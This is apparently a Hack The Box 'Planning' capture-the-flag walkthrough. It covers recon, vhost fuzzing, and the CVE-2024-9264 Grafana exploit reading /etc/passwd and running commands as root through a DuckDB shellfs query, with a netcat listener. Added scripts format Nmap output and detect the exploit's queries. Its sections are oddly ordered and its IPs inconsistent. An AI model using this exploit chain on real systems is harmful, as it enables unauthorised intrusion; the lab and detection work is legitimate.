Planning
Detection of open TCP ports (-p- --open).
Version scanning (-sV).
Execution of the usual NSE scripts for additional enumeration (-sC).
Export of the result to XML and conversion to HTML for easier reading.
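The last step of that list, turning the Nmap XML (-oX) into a readable report, is easy to reproduce. The script below is an added example and is not iRecon's own code: it parses the standard Nmap XML schema (nmaprun/host/ports/port), keeps only the ports in state "open" (the -p- --open semantics), and renders an HTML table. The embedded XML document is constructed to resemble what a scan of this box would produce; the only version taken from the page is nginx 1.24.0 (reported by whatweb below), the SSH version is a placeholder. Service banners and NSE script output are attacker-controlled text, so every cell is HTML-escaped before it reaches the report.

```python
"""Summarise Nmap XML output (-oX) as a table of open ports and render it as HTML.

Added example, not part of iRecon. Assumes the standard Nmap XML schema.
"""
import html
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -p- --open -sV -sC -oX scan.xml <target>` output.
# nginx 1.24.0 matches the whatweb result on this page; the SSH version is a placeholder.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p- --open -sV -sC -oX scan.xml 10.10.11.68">
  <host>
    <status state="up"/>
    <address addr="10.10.11.68" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="X.Y (constructed)"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.24.0"/>
        <script id="http-title" output="Did not follow redirect to http://planning.htb/"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per OPEN port: host, port, proto, service, version, scripts."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # same filter as -p- --open: drop closed/filtered ports
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            version = ""
            if svc is not None:
                version = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            # NSE (-sC) results hang off the port as <script id="..." output="..."/>
            scripts = {s.get("id"): s.get("output", "") for s in port.findall("script")}
            rows.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": name,
                "version": version,
                "scripts": scripts,
            })
    return rows


def render_html(rows):
    """Render the rows as a minimal HTML table.

    Banners and script output come from the scanned host, so each cell is
    escaped; otherwise a crafted banner could inject markup into the report.
    """
    out = ["<table><tr><th>Host</th><th>Port</th><th>Service</th>"
           "<th>Version</th><th>Scripts</th></tr>"]
    for r in rows:
        scripts = "; ".join(f"{k}: {v}" for k, v in r["scripts"].items())
        cells = [r["host"], f'{r["port"]}/{r["proto"]}', r["service"], r["version"], scripts]
        out.append("<tr>" + "".join(f"<td>{html.escape(str(c))}</td>" for c in cells) + "</tr>")
    out.append("</table>")
    return "\n".join(out)


if __name__ == "__main__":
    # Usage: python3 nmap_report.py > report.html  (here run on the constructed sample)
    print(render_html(parse_nmap_xml(SAMPLE_XML)))
```

Replacing SAMPLE_XML with the contents of a real scan.xml file gives the HTML summary that iRecon's last step produces.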
To start, we export the target machine's IP address into an environment variable named IP and run the iRecon tool, passing it that variable.
❯ export IP=10.10.11.68
❯ iRecon "$IP"
Open Ports Summary
In the port enumeration we found the following important ports:
Port  Service
22    SSH
80    HTTP
In Hack The Box, on some machines we are given access credentials to simulate a real pentest. In this case, we are given the following credentials, and later we will check where they can be used.
❯ echo '10.129.99.208 planning.htb' | sudo tee -a /etc/hosts
10.129.99.208 planning.htb
❯ whatweb -a 3 planning.htb
http://planning.htb [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[info@planning.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.129.99.208], JQuery[3.4.1], Script, Title[Edukate - Online Education Website], nginx[1.24.0]
❯ feroxbuster -u 'http://planning.htb' -t 200 -s 200
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://planning.htb
🚀 Threads │ 200
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 103l 772w 55609c http://planning.htb/img/about.jpg
200 GET 11l 56w 2406c http://planning.htb/lib/counterup/counterup.min.js
200 GET 6l 64w 2936c http://planning.htb/lib/owlcarousel/assets/owl.carousel.min.css
200 GET 1l 38w 2303c http://planning.htb/lib/easing/easing.min.js
200 GET 21l 212w 20494c http://planning.htb/img/team-3.jpg
200 GET 137l 234w 3338c http://planning.htb/js/main.js
200 GET 8l 58w 5269c http://planning.htb/img/testimonial-1.jpg
200 GET 201l 663w 10632c http://planning.htb/contact.php
200 GET 7l 158w 9028c http://planning.htb/lib/waypoints/waypoints.min.js
200 GET 63l 389w 30916c http://planning.htb/img/team-1.jpg
200 GET 60l 404w 29126c http://planning.htb/img/team-2.jpg
200 GET 128l 607w 48746c http://planning.htb/img/courses-2.jpg
200 GET 420l 1623w 23914c http://planning.htb/index.php
200 GET 146l 790w 75209c http://planning.htb/img/feature.jpg
200 GET 7l 279w 42766c http://planning.htb/lib/owlcarousel/owl.carousel.min.js
200 GET 136l 656w 53333c http://planning.htb/img/courses-3.jpg
200 GET 173l 851w 64663c http://planning.htb/img/courses-1.jpg
200 GET 9966l 19218w 183895c http://planning.htb/css/style.css
200 GET 194l 674w 10229c http://planning.htb/course.php
200 GET 5l 89w 5527c http://planning.htb/img/testimonial-2.jpg
200 GET 220l 880w 13006c http://planning.htb/detail.php
200 GET 230l 874w 12727c http://planning.htb/about.php
200 GET 420l 1623w 23914c http://planning.htb/
[####################] - 70s 150032/150032 0s found:23 errors:0
[####################] - 69s 30000/30000 438/s http://planning.htb/
[####################] - 69s 30000/30000 437/s http://planning.htb/css/
[####################] - 69s 30000/30000 436/s http://planning.htb/js/
[####################] - 69s 30000/30000 436/s http://planning.htb/lib/
[####################] - 69s 30000/30000 436/s http://planning.htb/img/
❯ wfuzz --hh=178 --hc=400,404 -c -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -H "Host: FUZZ.planning.htb" http://planning.htb/ 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://planning.htb/
Total requests: 220545
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 294.3591
Processed Requests: 220545
Filtered Requests: 220545
Requests/sec.: 749.2378
❯ wfuzz --hh=178 --hc=400,404 -c -t 200 -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.planning.htb" http://planning.htb/ 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://planning.htb/
Total requests: 100000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000024093: 302 2 L 2 W 29 Ch "grafana"
Total time: 144.4229
Processed Requests: 100000
Filtered Requests: 99999
Requests/sec.: 692.4105
❯ tail -n 1 /etc/hosts
10.129.99.208 planning.htb grafana.planning.htb
❯ whatweb -a 3 grafana.planning.htb
http://grafana.planning.htb [302 Found] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.129.99.208], RedirectLocation[/login], UncommonHeaders[x-content-type-options], X-Frame-Options[deny], X-XSS-Protection[1; mode=block], nginx[1.24.0]
http://grafana.planning.htb/login [200 OK] Country[RESERVED][ZZ], Grafana[11.0.0], HTML5, HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.129.99.208], Script[text/javascript], Title[Grafana], UncommonHeaders[x-content-type-options], X-Frame-Options[deny], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.24.0]
❯ git clone https://github.com/nollium/CVE-2024-9264; cd CVE-2024-9264
Cloning into 'CVE-2024-9264'...
remote: Enumerating objects: 67, done.
remote: Counting objects: 100% (67/67), done.
remote: Compressing objects: 100% (56/56), done.
remote: Total 67 (delta 38), reused 21 (delta 9), pack-reused 0 (from 0)
Receiving objects: 100% (67/67), 20.96 KiB | 3.49 MiB/s, done.
Resolving deltas: 100% (38/38), done.
❯ python3 -m venv .env
❯ source .env/bin/activate
❯ pip install -r requirements.txt
❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Reading file: /etc/passwd
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/etc/passwd'):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
grafana:x:472:0::/home/grafana:/usr/sbin/nologin
❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'id' http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: id
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('id >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
uid=0(root) gid=0(root) groups=0(root)
❯ nc -nlvp 443
listening on [any] 443 ...
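The two DuckDB queries printed by the exploit above (read_blob for file reads; install shellfs / LOAD shellfs / read_csv with a trailing pipe for command execution) are the observable artefacts of CVE-2024-9264, so they are what a defender should look for. The script below is an added example and is not part of the exploit repository or of Grafana: it assumes you can obtain the SQL expression text submitted to Grafana (for instance from a reverse-proxy request-body log, which is an assumption, not something the page shows) and classifies each expression. The three sample expressions are constructed; two of them are copied from the exploit output above.

```python
"""Flag DuckDB SQL expressions of the kind used against Grafana in CVE-2024-9264.

Added defensive example; not part of the exploit or of Grafana. Input is the raw
SQL expression text (assumed to be extracted from request logs).
"""
import re

# (finding name, pattern). Case-insensitive: DuckDB keywords and function names are.
RULES = [
    ("file-read-via-read_blob", re.compile(r"\bread_(?:blob|text)\s*\(", re.I)),
    ("community-extension-install", re.compile(r"\binstall\s+\w+\s+from\s+community\b", re.I)),
    ("shellfs-load", re.compile(r"\bload\s+shellfs\b", re.I)),
    # shellfs runs the "path" as a command when it ends with '|', as in the exploit output.
    ("shellfs-pipe-exec", re.compile(r"\bread_\w+\s*\(\s*'[^']*\|\s*'", re.I)),
]


def classify_sql_expression(expr):
    """Return the list of finding names that match the expression (empty if benign)."""
    findings = [name for name, pat in RULES if pat.search(expr)]
    # Several ';'-separated statements in one dashboard expression is how the
    # install / LOAD / read_csv chain is delivered; a normal expression is one SELECT.
    statements = [s for s in expr.split(";") if s.strip()]
    if len(statements) > 1:
        findings.append("stacked-statements")
    return findings


def severity(findings):
    """Map findings to a triage level: command execution > file read > anything else."""
    if "shellfs-pipe-exec" in findings or "shellfs-load" in findings:
        return "critical"
    if "file-read-via-read_blob" in findings:
        return "high"
    if findings:
        return "medium"
    return "none"


# Constructed samples. "file_read" and "rce" are the queries the exploit printed above.
SAMPLE_EXPRESSIONS = {
    "benign": "SELECT time, value FROM A WHERE value > 10",
    "file_read": "SELECT content FROM read_blob('/etc/passwd')",
    "rce": ("SELECT 1;install shellfs from community;LOAD shellfs;"
            "SELECT * FROM read_csv('id >/tmp/grafana_cmd_output 2>&1 |')"),
}


def triage(expressions):
    """Return {label: (severity, findings)} for a dict of labelled expressions."""
    result = {}
    for label, expr in expressions.items():
        findings = classify_sql_expression(expr)
        result[label] = (severity(findings), findings)
    return result


if __name__ == "__main__":
    for label, (level, findings) in triage(SAMPLE_EXPRESSIONS).items():
        print(f"{label:10s} {level:8s} {findings}")
```

Any hit on the "critical" or "high" rules from a Grafana 11.0.0 instance like the one found above warrants treating the host as compromised (the RCE chain runs as the Grafana service user, here root per the id output), and the same patterns can be fed to a SIEM rule once the expression text is available in your logs.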
For the initial reconnaissance phase of the Planning machine we used our custom tool iRecon. This tool automates a full Nmap scan that includes:
From the result of the Nmap port scan, we find that port 22 (SSH) is open, along with a website on port 80 (HTTP) that redirects us to planning.htb. The scan result also shows that the target is a Linux system.